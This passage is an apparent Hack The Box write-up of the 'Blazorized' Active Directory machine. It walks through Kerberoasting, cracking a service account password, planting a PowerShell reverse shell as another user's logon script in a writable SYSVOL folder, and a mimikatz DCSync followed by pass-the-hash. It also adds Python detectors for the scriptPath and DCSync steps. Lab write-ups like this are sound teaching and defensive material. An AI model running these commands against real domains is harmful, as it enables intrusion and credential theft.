Do NOT report auto-detect issues unless you are certain of the hash type.
...[snip]...
$krb5tgs$23$*RSA_4810$blazorized.htb$nonexistent/BLAHBLAH*$5ab431f9a16255580ac64a945c3ee2ef$ae1e3fa9d3dd4523fc011f824beaf1add4b48765084c51b09ae51b988b33ade938dcca763fd88d3da29d0666a0198a105921ed200782d01241117a7222c98c9717fbaeadb79df75811f45f769cdb1f80e8a2ea73999cb894bb7cc833f7dfe752a9f61684fb39ab3e9ada2609eb336635d7050c9a68881a8018ff5941ccfa7fe381c272cfad3901588aa892490d2a59e3e4c4056e811aaa2e8200c686156bb78202fac986a8c9799fc7da0e4af126154234420697b65115dc3116dd3958a6af6206d483a572cc368428f8b38fb00ba17bbab46d3ce277db8a14d51b3ae92f8d41632ec88139a13d6a2fbd08417bc74c21ade120e7226620a2499e98eaaf308e5eaf3430e6d82713df5754dea62857885455dbd482a174406dbf03681ec41ab964f6e88f77139dd0dbdd132f5f785c9bd3fd6a14d441f25380643d0b14ef8052cb89ec19244530868d3eff7549b190319020066c31e39be34d6481e4b4949ae8f4441ac55a0f0e35454cd82ace715d40aa632b19b24e308571ce6af5ab3f22cff75792f22b07f13d6a5b65318a2c6c0ff05d193a5bb51adf3d7568bf544960a476a62e25cbe1e88b5218479a41cb7860ae2da50d5094f706a702c85a9290c06c7ef2e7cbc2ee40600516a5bd3933613d5154a810d47799e5bd9b3ac80dc5f3cc69128580e7f74563817af617344533e241f310e0d42f7d057535d40481a620ee28e7e0425b860925a1c69c16b533c4d7512d2b028b5ec9a04157e3852ee934d3cfa9b88f8c4eeaf31b42350e51f10f745e9cc1afbb1fa2d91bfaf6fb149e93baf4e06cb9d942a3b78bd13fc2d7a5833d5b901dd197a017eb400f9434833bba097c0d09f17b35ec84a685276c14ca6fbb5cf361b7810e1b8832fc1f2cbff50a0e5396052957ce1d38d9c23d05733c1145a3fcfc83f077bf49be812406246e09e23b0c85ed8c5afd4137e9643b21f85df26cbee0073dd9dda3d17178654bc8dffee39f1f70b48fda4029a67b6a96ad95e6abedb107ed255ac8b4db45b19296b5905ff3126c50567bdeb6825ae6cd56d9f65133ef8bb0a8c0130878e4f9eb78401d33e9462f9370ab2d3486721a0c3fb38963e166c37f69992a96c6004cbd65d08acf9b3225eed3a753a14db6b7d3a7547e8075e56ad5d9cac891f907f17d0b2e1b87225a5c56b72cc67e9a161a51b60f7df2de55cc70d5c7b940386bbd0bfa4079f1f81fee7b90482b307f819506028910c511890d9897bcfe96be0fb76dd45d125a773739ca0b6a0ee76945237d8b12eca112d43f639d690113c6681033cc62a9bae235a1865c18c170fb3f534ef44e4bd111ef651501aaa168dd58
e2f109009a0a51bef25f96747cf60c1b32696e1f885ff90504c05e24a93a2616de3ddace2d2df46debf36da4be7f1a972ad48d71863bbb35a3793683380fb61dff44f36846a2b3ec21635cfaf9d82b23d36ec546344652ffc875d8b2e1805beccece6839baad3a58d16617f4039108c21ac3622724def43b68776c33cc05b5082c807c14d2350fd3bebd62c59f6c1510d95ee441d32749696195b71d8e34ae8c90d1c7bc1fd6b2d786a72e08858e20f98483c6ecb853b2d3f6782c4bb2db433b43e623fcfcb8b0a8abb2d2b929a3aa6eee6e40c950d51e9f2e9c6c7dfded56d24d68f67a3f21ac19da0c9450f9eb53de59b18a9981892ad2ec9ca38d825fc26f64a4b31a0d677d9509d3dfa3b33ee4106d7ad40e02c08c97513298c1298c1414ef6bf6198335c2709cd1c5bb597f:(Ni7856Do9854Ki05Ng0005 #)
...[snip]...

It auto-detects the hash format, and in about 5 seconds finds the password “(Ni7856Do9854Ki05Ng0005 #)”.

Alternatively, targetedKerberoast.py does the same thing from Kali with the nu_1055 credentials:

┌──(bolke㉿bolke)-[~/targetedKerberoast]
└─$ targetedKerberoast.py -v -d 'blazorized.htb' -u 'NU_1055' -p 'Start123!' 
targetedKerberoast.py: command not found
                                                                                                                     
┌──(bolke㉿bolke)-[~/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'blazorized.htb' -u 'NU_1055' -p 'Start123!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (RSA_4810)
$krb5tgs$23$*RSA_4810$BLAZORIZED.HTB$blazorized.htb/RSA_4810*$f783f3e82de70ef51c9ef82fd8745e2a$1488e85d10505da9b267cd082317eb6fe2b28218477dc6d996914a868235e36957649f79f9639f011c31226fafcf19a0bdb923e2d3ba3b3feb82a8d0288c8f3e0866516ee00e8723496edde12cfc920a2d10ac65bf08181b713dd22126f7229cc79634a985270003353431141bfd7822d9f3a840d0b4b5be906fad1f75d61ea33557bbf326208cd0751d6e278b312bb2578d13891beb4d84315b8b07ee868bd028d310813062fb70ed95313f90393cb41d829e5e31aac727debed362fce2fdf044af44c5adf99c0fb960d232eee822645656bc64a739f3835780f3ecae3ac154f961c9b344854ce11e01e67b6f3cf6e47ec36fc7519f84aa998353fb338fbcf4ad0b74bba773e291477ac0ace03f00903da41c3cddf623e701d8747b67fd14a31984e72d87029963ff6c0b3b612c063ae65c5b907977feff6b7d574fe70292d2725052e905f96c0f250520080b5bcd2f933001ae34ac0e2dc858c09ff19fe5c620c8458d05abfaebc554a58d939ae29ecbf188c35d602467dd03656658b586dd4871b4c6f24f951bacce026b527207ccfd60afcfbcbcda700ef0c02325361ebc52d54d75a78fe9db67e73b6e19b652f498542a37fe2a6bf55cbe494e0e21c8c3631edbcf753f0c89947640f0fe5a3cf39077051e562bf76bee7ce646c5417804be7fdb8b45f281bf53f0652803366c5d3068b27c886113e1942d07c325b7e043c4c3632a66dd9b41527a8bae37a3831be8c99db2710450e66fe473b78c6a36c527e456f584d69ee0199ddbfbd70e1e9f2bff5af0dbe07f700e8ece4cbc59496a9022ecd9a87730c7b44cf0dfe2841be12ff96d032ffda6d4344c84441790f47ad9d16a85f336ed7ab27ffee7d8a51ca9afe4f4649e6d018c22baaec504800d14818b65f189b0af2e8121fceb940648ce38efada01c1d5b6f056ad3cfd38b3bb96bbc7ae1582bcb51303665f77e53a32dc331a7e1221507e5f1ddb4a405fa230004caad0e3ad87dbd36a0977c041400b510f4ee993c32bd214018a5f02daaf24732f796cd6199aa8d46fcb14ce7f67b3efa7326bcdd1dd0c6f864d774afde7270721b3f22458e0140b764dfae91d14a2330eff38a940ad7d09660aa88113a31c535753d78c0294e017a501aed616817427b919d3a52b20286b1872ab512d2a9d06e7f1a39269543ed18fc0915e8d16658bda01a23002c9a903b6a19f49da97384e430e338679fd09dc0a74ca01301c08a7898a6b67d8a0f1f5502173202d8984dffed2213ebd8ff42592cb432cefab7bd07326069287bf386f059d08fad68d3fb6c4c93c3363528f418101d4dc6f641176229f88c0032c3136
fdffefc4727385eecf6d603461d4a2f09563840fbf43a50d15107f64495901f952c0255b8e7e5a9645869f32240859a0b923f09772ab68ff50686e4c056f038ab5ce3ffeeea4f4c7f7d0afeeeab53ddb87f0a222b900e29fdc1365135a027673acfd912578145013316f2d9ee8cfcb14c0b20a084f8a12930baf53438d00e0cfe9ddad0086890d8cd3311a6f0750b9dd1366d01a4693b29cb6eba343a4e665fd01ac564dda94ab22ef33fe3fb937b470276ab883c26


Shell

Validate Creds

The creds work over SMB:

puck@kali$ netexec smb blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [+] blazorized.htb\rsa_4810:(Ni7856Do9854Ki05Ng0005 #) 

They also work over WinRM:

puck@hkali$ netexec winrm blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
WINRM       10.10.11.22     5985   DC1              [*] Windows 10 / Server 2019 Build 17763 (name:DC1) (domain:blazorized.htb)
WINRM       10.10.11.22     5985   DC1              [+] blazorized.htb\rsa_4810:(Ni7856Do9854Ki05Ng0005 #) (Pwn3d!)

I could also see this from the shell as nu_1055 as rsa_4810 is in the Remote Management Users group:

PS C:\programdata> net user rsa_4810
User name                    RSA_4810
Full Name                    RSA_4810
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/25/2024 12:55:59 PM
Password expires             Never
Password changeable          2/26/2024 12:55:59 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   2/2/2024 12:44:30 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Remote_Support_Admini
The command completed successfully.

Evil-WinRM

I’ll connect with evil-winrm:

puck@kali$ evil-winrm -i blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents>

Shell as SSA_6010

Enumeration

Groups

rsa_4810 is a member of a unique group, Remote_Support_Administrators:

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Remote_Support_Administrators    Group            S-1-5-21-2039403211-964143010-2924010611-1115 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Writable Directories

accesschk from Sysinternals is a nice way to check for writable directories. I’ll check for any in C:\Windows, and it finds a bunch:

*Evil-WinRM* PS C:\programdata> .\accesschk64 /accepteula -uwds blazorized\rsa_4810 C:\Windows

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

RW C:\Windows\Tasks
RW C:\Windows\tracing
RW C:\Windows\Registration\CRMLog
 W C:\Windows\System32\Tasks
RW C:\Windows\System32\spool\drivers\color
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\21FDFAAFC1D0
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3\0EEB3FED3C10\DE3FC3AD20F0
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3\0EEB3FED3C10\EA1EBECD3ADA
...[snip]...

 

There’s a ton of output, but the important bit is that rsa_4810 seems to have full control over these two directories:

*Evil-WinRM* PS C:\> icacls \Windows\SYSVOL\domain\scripts\A32FF3AEAA23
\Windows\SYSVOL\domain\scripts\A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
                                            BLAZORIZED\Administrator:(OI)(CI)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            BUILTIN\Server Operators:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\> icacls \Windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23
\Windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
                                                           BLAZORIZED\Administrator:(OI)(CI)(F)
                                                           BUILTIN\Administrators:(I)(F)
                                                           CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
                                                           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                           BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                           BUILTIN\Server Operators:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files

These two paths refer to the same directory (one is a junction to the other): the scripts folder in SYSVOL that typically stores the logon, logoff, startup, and shutdown scripts applied to users and computers in the domain.

Users

The only remaining users with home directories are ssa_6010 and administrator. Looking a bit more closely, I’ll see that Bloodhound reports that ssa_6010 has a session on DC1:

The Last Logon time is also today, within a few minutes of the Bloodhound collection:

PowerShell can show this as well:

*Evil-WinRM* PS C:\> [DateTime]::FromFileTime((Get-ADUser SSA_6010 -properties LastLogon).LastLogon)
Friday, November 1, 2024 8:36:43 AM
*Evil-WinRM* PS C:\> date
Friday, November 1, 2024 8:37:11 AM

It seems that ssa_6010 logs on every minute.

Logon Script

The SSA_6010 user doesn’t have a logon script set in their Active Directory object:

*Evil-WinRM* PS C:\users> Get-ADUser SSA_6010 -properties ScriptPath

DistinguishedName : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
Enabled           : True
GivenName         :
Name              : SSA_6010
ObjectClass       : user
ObjectGUID        : 8bf3166b-e716-4f91-946c-174e1fb433ed
SamAccountName    : SSA_6010
ScriptPath        :
SID               : S-1-5-21-2039403211-964143010-2924010611-1124
Surname           :
UserPrincipalName : SSA_6010@blazorized.htb

However, RSA_4810 is able to set one:

*Evil-WinRM* PS C:\users> Get-ADUser SSA_6010 | Set-ADUser -ScriptPath puck
*Evil-WinRM* PS C:\users> Get-ADUser SSA_6010 -properties ScriptPath

DistinguishedName : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
Enabled           : True
GivenName         :
Name              : SSA_6010
ObjectClass       : user
ObjectGUID        : 8bf3166b-e716-4f91-946c-174e1fb433ed
SamAccountName    : SSA_6010
ScriptPath        : puck
SID               : S-1-5-21-2039403211-964143010-2924010611-1124
Surname           :
UserPrincipalName : SSA_6010@blazorized.htb

Another way to find this while enumerating is with the Find-InterestingDomainAcl cmdlet from PowerView.ps1. If I run it and filter for entries whose identity is RSA_4810, I’ll see that this user has WriteProperty access to SSA_6010’s Script-Path:

*Evil-WinRM* PS C:\programdata> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}


ObjectDN                : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : WriteProperty
ObjectAceType           : Script-Path
AceFlags                : None
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2039403211-964143010-2924010611-1107
IdentityReferenceName   : RSA_4810
IdentityReferenceDomain : blazorized.htb
IdentityReferenceDN     : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
IdentityReferenceClass  : user
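For defenders, the two findings above (a script directory writable by a low-privileged user, plus WriteProperty on Script-Path) have a direct audit and detection counterpart. The following is an added Python example, not code from the writeup: it assumes the ACEs and Security events have already been exported as dictionaries using the field names Find-InterestingDomainAcl and event 5136 produce, and the trusted-writer set is an assumption.

```python
from collections import defaultdict

# Added example, not from the writeup. Two defender-side checks for the scriptPath
# weakness above: (1) find ACEs, in the shape Find-InterestingDomainAcl prints, that
# let an untrusted principal write Script-Path; (2) flag scriptPath changes recorded
# by Security event 5136 (Audit Directory Service Changes) made by untrusted writers.
# All inputs are constructed samples that reuse the box's account names.
TRUSTED_WRITERS = {"administrator", "dc1$"}   # assumed set of legitimate editors

SAMPLE_ACES = [
    {"ObjectDN": "CN=SSA_6010,CN=Users,DC=blazorized,DC=htb", "ActiveDirectoryRights": "WriteProperty",
     "ObjectAceType": "Script-Path", "IdentityReferenceName": "RSA_4810"},
    {"ObjectDN": "CN=SSA_6010,CN=Users,DC=blazorized,DC=htb", "ActiveDirectoryRights": "GenericAll",
     "ObjectAceType": "All", "IdentityReferenceName": "Administrator"},
]
# One Set-ADUser -ScriptPath call logs a "Value Deleted"/"Value Added" pair sharing
# an OpCorrelationID (OperationType shown in its rendered form).
SAMPLE_5136 = [
    {"EventID": 5136, "OpCorrelationID": "{op-1}", "SubjectUserName": "RSA_4810",
     "ObjectDN": "CN=SSA_6010,CN=Users,DC=blazorized,DC=htb", "AttributeLDAPDisplayName": "scriptPath",
     "OperationType": "Value Deleted", "AttributeValue": "puck"},
    {"EventID": 5136, "OpCorrelationID": "{op-1}", "SubjectUserName": "RSA_4810",
     "ObjectDN": "CN=SSA_6010,CN=Users,DC=blazorized,DC=htb", "AttributeLDAPDisplayName": "scriptPath",
     "OperationType": "Value Added", "AttributeValue": "A32FF3AEAA23\\puck.bat"},
    {"EventID": 5136, "OpCorrelationID": "{op-2}", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=NU_1055,CN=Users,DC=blazorized,DC=htb", "AttributeLDAPDisplayName": "description",
     "OperationType": "Value Added", "AttributeValue": "web service account"},
]

def scriptpath_write_aces(aces, trusted=TRUSTED_WRITERS):
    """(identity, objectDN) for ACEs that let an untrusted principal write Script-Path."""
    hits = []
    for ace in aces:
        rights, target = ace["ActiveDirectoryRights"], ace["ObjectAceType"]
        # object-specific WriteProperty on Script-Path, WriteProperty on all
        # properties, or a generic right that includes it
        can_write = ("WriteProperty" in rights and target in ("Script-Path", "All")) \
            or "GenericAll" in rights or "GenericWrite" in rights
        if can_write and ace["IdentityReferenceName"].lower() not in trusted:
            hits.append((ace["IdentityReferenceName"], ace["ObjectDN"]))
    return hits

def scriptpath_changes(events, trusted=TRUSTED_WRITERS):
    """Pair each modification's delete/add halves; report old and new value for untrusted writers."""
    ops = defaultdict(dict)
    for ev in events:
        if ev["EventID"] == 5136 and ev["AttributeLDAPDisplayName"].lower() == "scriptpath":
            key = (ev["OpCorrelationID"], ev["SubjectUserName"], ev["ObjectDN"])
            ops[key][ev["OperationType"]] = ev["AttributeValue"]
    return [{"writer": w, "object": dn, "old": v.get("Value Deleted"), "new": v.get("Value Added")}
            for (_, w, dn), v in ops.items() if w.lower() not in trusted]
```

The ACE check is the preventive side (fix the delegation); the 5136 pairing is the detective side, and needs "Audit Directory Service Changes" enabled on the DC to produce events at all.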

Execution

Strategy

Logon scripts are specified relative to the scripts directory above. I’m going to set that path to something like A32FF3AEAA23\puck.bat, and then write that script into place as a reverse shell. When SSA_6010 logs in, it’ll execute and I’ll get a shell.

Payload

I’ll grab a PowerShell #3 (Base64) reverse shell from revshells.com and write it to a .bat file using Out-File:

*Evil-WinRM* PS C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23> echo "powershell -e JABj...[snip]...CkA" | Out-File -FilePath puck.bat -Encoding ASCII
*Evil-WinRM* PS C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23> ls puck.bat

    Directory: C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        12/2/2025   8:48 AM           1344 puck.bat

There is a cleanup script that deletes these files, so I’ll need to move fast.

Exploit

I’ll set SSA_6010’s ScriptPath:

*Evil-WinRM* PS C:\> Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'A32FF3AEAA23\puck.bat'

In less than a minute, I get a shell at nc:

puck@kali$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.22 53958

PS C:\Windows\system32> 

Shell as administrator

Enumeration

SSA_6010 is a member of the Super_Support_Administrators group, which has significant privileges over the domain:

 

Hash Dump

With DCSync privileges, SSA_6010 can dump all the hashes for the domain. I’ve shown this many times before with secretsdump from my host (most recently on Mist). But in this case, I don’t have creds as the user that I want to dump with. I’ll use Mimikatz.

I’ll upload it to \programdata (I used my Evil-WinRM shell, but a Python webserver would work too). It’s an interactive tool when run as .\mimikatz.exe, which in this reverse shell will just hang and/or fail. But I can pass commands in at the command line in the format mimikatz.exe "[command]" "[command]" exit.

The mimikatz command I want is lsadump::dcsync /user:administrator:

PS C:\programdata> .\mimikatz "lsadump::dcsync /user:administrator" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID   : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
    ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
    ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
    ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
    ntlm- 5: b471c416c10615448c82a2cbb731efcb
    ntlm- 6: b471c416c10615448c82a2cbb731efcb
    ntlm- 7: aec132eaeee536a173e40572e8aad961
    ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
    ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
    lm  - 0: ad37753b9f78b6b98ec3bb65e5995c73
    lm  - 1: c449777ea9b0cd7e6b96dd8c780c98f0
    lm  - 2: ebbe34c80ab8762fa51e04bc1cd0e426
    lm  - 3: 471ac07583666ccff8700529021e4c9f
    lm  - 4: ab4d5d93532cf6ad37a3f0247db1162f
    lm  - 5: ece3bdafb6211176312c1db3d723ede8
    lm  - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
    lm  - 7: 8b3c1950099a9d59693858c00f43edaf
    lm  - 8: a14ac624559928405ef99077ecb497ba

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 36ff197ab8f852956e4dcbbe85e38e17

* Primary:Kerberos-Newer-Keys *
    Default Salt : BLAZORIZED.HTBAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
      aes128_hmac       (4096) : df4dbea7fcf2ef56722a6741439a9f81
      des_cbc_md5       (4096) : 310e2a0438583dce
    OldCredentials
      aes256_hmac       (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
      aes128_hmac       (4096) : db4d9e0e5cd7022242f3e03642c135a6
      des_cbc_md5       (4096) : 1c67ef730261a198
    OlderCredentials
      aes256_hmac       (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
      aes128_hmac       (4096) : 2d9925ef94916523b24e43d1cb8396ee
      des_cbc_md5       (4096) : 9b01158c8923ce68

* Primary:Kerberos *
    Default Salt : BLAZORIZED.HTBAdministrator
    Credentials
      des_cbc_md5       : 310e2a0438583dce
    OldCredentials
      des_cbc_md5       : 1c67ef730261a198

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  7e35fe37aac9f26cecc30390171b6dcf
    02  a8710c4caaab28c0f2260e7c7bd3b262
    03  81eae4cf7d9dadff2073fbf2d5c60539
    04  7e35fe37aac9f26cecc30390171b6dcf
    05  9bc0a87fd20d42df13180a506db93bb8
    06  26d42d164b0b82e89cf335e8e489bbaa
    07  d67d01da1b2beed8718bb6785a7a4d16
    08  7f54f57e971bcb257fc44a3cd88bc0e3
    09  b3d2ebd83e450c6b0709d11d2d8f6aa8
    10  1957f9211e71d307b388d850bdb4223f
    11  2fa495bdf9572e0d1ebb98bb6e268b01
    12  7f54f57e971bcb257fc44a3cd88bc0e3
    13  de0bba1f8bb5b81e634fbaa101dd8094
    14  2d34f278e9d98e355b54bbd83c585cb5
    15  06b7844e04f68620506ca4d88e51705d
    16  97f5ceadabcfdfcc019dc6159f38f59e
    17  ed981c950601faada0a7ce1d659eba95
    18  cc3d2783c1321d9d2d9b9b7170784283
    19  0926e682c1f46c007ba7072444a400d7
    20  1c3cec6d41ec4ced43bbb8177ad6e272
    21  30dcd2ebb2eda8ae4bb2344a732b88f9
    22  b86556a7e9baffb7faad9a153d1943c2
    23  c6e4401e50b8b15841988e4314fbcda2
    24  d64d0323ce75a4f3dcf0b77197009396
    25  4274d190e7bc915d4047d1a63776bc6c
    26  a04215f3ea1d2839a3cdca4ae01e2703
    27  fff4b2817f8298f09fd45c3be4568ab1
    28  2ea3a6b979470233687bd913a8234fc7
    29  73d831d131d5e67459a3949ec0733723


mimikatz(commandline) # exit
Bye!

 

This gives the NTLM hash of the administrator account.
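The replication that lsadump::dcsync performs is auditable on the DC. As an added example (not part of the original writeup), the Python below flags Security event 4662 entries that request the directory replication extended rights from an account that is not a known domain controller; the events are constructed samples and the set of DC machine accounts is an assumption.

```python
import re

# Added example, not from the writeup. Detection logic for the DCSync step above:
# on a DC with "Audit Directory Service Access" enabled, a replication request is
# logged as Security event 4662 whose Properties field lists the control-access
# right GUIDs requested. The GUIDs below are the well-known replication extended
# rights; the events are constructed samples that reuse the box's account names.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})", re.I)
DS_CONTROL_ACCESS = 0x100   # AccessMask bit for extended (control access) rights

SAMPLE_4662 = [
    # a domain controller replicating: expected
    {"EventID": 4662, "SubjectUserName": "DC1$", "ObjectName": "DC=blazorized,DC=htb",
     "AccessMask": "0x100", "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
     "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # the same rights requested by an ordinary user account: DCSync
    {"EventID": 4662, "SubjectUserName": "SSA_6010", "ObjectName": "DC=blazorized,DC=htb",
     "AccessMask": "0x100", "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
     "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # a different extended right (User-Force-Change-Password): not replication
    {"EventID": 4662, "SubjectUserName": "RSA_4810", "ObjectName": "CN=SSA_6010,CN=Users,DC=blazorized,DC=htb",
     "AccessMask": "0x100", "Properties": "Control Access\n\t{00299570-246d-11d0-a768-00aa006e0529}"},
]

def replication_rights_requested(properties):
    """Names of replication rights among the GUIDs in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]

def detect_dcsync(events, dc_accounts=("DC1$",)):
    """(subject, object, rights) for 4662 events where an account that is not a
    known domain controller requested directory replication rights."""
    known_dcs = {a.lower() for a in dc_accounts}
    findings = []
    for ev in events:
        if ev["EventID"] != 4662 or not int(ev["AccessMask"], 16) & DS_CONTROL_ACCESS:
            continue
        rights = replication_rights_requested(ev["Properties"])
        if rights and ev["SubjectUserName"].lower() not in known_dcs:
            findings.append((ev["SubjectUserName"], ev["ObjectName"], rights))
    return findings
```

Accounts that legitimately replicate but are not DCs (for example a directory synchronisation service account) belong in the allowlist, and the underlying fix is to remove the replication rights from groups like Super_Support_Administrators.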

Shell

Evil-WinRM will get a shell as administrator:

puck@kali$ evil-winrm -i blazorized.htb -u administrator -H f55ed1465179ba374ec1cad05b34a5f3
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And I can grab root.txt: